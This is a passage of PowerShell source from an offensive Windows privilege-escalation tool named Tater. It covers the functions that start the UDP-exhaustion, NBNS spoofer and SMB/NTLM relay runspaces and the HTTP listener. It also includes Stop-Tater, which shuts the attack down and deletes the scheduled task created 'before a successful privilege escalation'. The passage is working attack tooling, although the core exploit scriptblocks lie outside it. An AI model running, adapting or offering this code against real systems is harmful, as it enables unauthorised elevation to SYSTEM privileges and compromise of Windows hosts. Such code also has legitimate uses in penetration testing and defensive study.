$exhaust_UDP_powershell.Runspace = $exhaust_UDP_runspace
$exhaust_UDP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$exhaust_UDP_powershell.AddScript($exhaust_UDP_scriptblock) > $null
$exhaust_UDP_powershell.BeginInvoke() > $null
}
# Spoofer Startup Function
function Spoofer()
{
$spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$spoofer_runspace.Open()
$spoofer_runspace.SessionStateProxy.SetVariable('tater',$tater)
$spoofer_powershell = [PowerShell]::Create()
$spoofer_powershell.Runspace = $spoofer_runspace
$spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$spoofer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
$spoofer_powershell.AddScript($spoofer_scriptblock).AddArgument($IP).AddArgument($SpooferIP).AddArgument(
$Hostname).AddArgument($NBNSLimit) > $null
$spoofer_powershell.BeginInvoke() > $null
}
# Tater Loop Function
function TaterLoop()
{
$tater_runspace = [RunspaceFactory]::CreateRunspace()
$tater_runspace.Open()
$tater_runspace.SessionStateProxy.SetVariable('tater',$tater)
$tater_powershell = [PowerShell]::Create()
$tater_powershell.Runspace = $tater_runspace
$tater_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$tater_powershell.AddScript($tater_scriptblock).AddArgument($NBNS).AddArgument($NBNSLimit).AddArgument(
$RunTime).AddArgument($SpooferIP).AddArgument($Hostname).AddArgument(
$HTTPPort) > $null
$tater_powershell.BeginInvoke() > $null
}
# HTTP Server Start
HTTPListener
# Exhaust UDP Start
if($ExhaustUDP -eq 'Y')
{
ExhaustUDP
}
# Spoofer Start
if($NBNS -eq 'Y')
{
Spoofer
}
# Tater Loop Start
TaterLoop
if($tater.console_output)
{
:console_loop while($tater.running -and $tater.console_output)
{
while($tater.console_queue.Count -gt 0)
{
Write-Output($tater.console_queue[0] + $tater.newline)
$tater.console_queue.RemoveRange(0,1)
}
if($tater.console_input)
{
if([Console]::KeyAvailable)
{
$tater.console_output = $false
BREAK console_loop
}
}
Start-Sleep -m 5
}
if(!$tater.running)
{
Remove-Variable tater -scope global
}
}
}
#End Invoke-Tater
function Stop-Tater
{
<#
.SYNOPSIS
Stop-Tater will stop Tater before a successful privilege escalation.
#>
if($tater)
{
if($tater.running)
{
Write-Output "$(Get-Date -format 's') - Stopping HTTP listener"
$tater.HTTP_listener.server.blocking = $false
Start-Sleep -s 1
$tater.HTTP_listener.server.Close()
Start-Sleep -s 1
$tater.HTTP_listener.Stop()
$tater.running = $false
if($tater.task_delete -and $tater.task_added)
{
$scheduled_task_deleted = $false
$schedule_service = new-object -com("Schedule.Service")
$schedule_service.connect()
$scheduled_task_folder = $schedule_service.getfolder("\")
$scheduled_task_list = $scheduled_task_folder.gettasks(1)
foreach($scheduled_task in $scheduled_task_list)
{
if($scheduled_task.name -eq $tater.task)
{
$scheduled_task_folder.DeleteTask($scheduled_task.name,0)
}
}
foreach($scheduled_task in $scheduled_task_list)
{
if($scheduled_task.name -eq $tater.task)
{
$scheduled_task_deleted = $true
}
}
if($scheduled_task_deleted)
{
Write-Output ("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deleted successfully")
}
else
{
Write-Output ("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deletion failed, remove manually")
}
}
elseif($tater.task_added)
{
Write-Output ("$(Get-Date -format 's') - Remove scheduled task " + $tater.task + " manually when finished")
}
Write-Output "$(Get-Date -format 's') - Tater has been stopped"
}
else
{
Write-Output "Tater isn't running"
}
}
else
{
Write-Output "Tater isn't running"
}
Remove-Variable tater -scope global
}
function Get-Tater
{
<#
.SYNOPSIS
Get-Tater will display queued Tater output.
#>
while($tater.console_queue.Count -gt 0)
{
Write-Output($tater.console_queue[0] + $tater.newline)
$tater.console_queue.RemoveRange(0,1)
}
}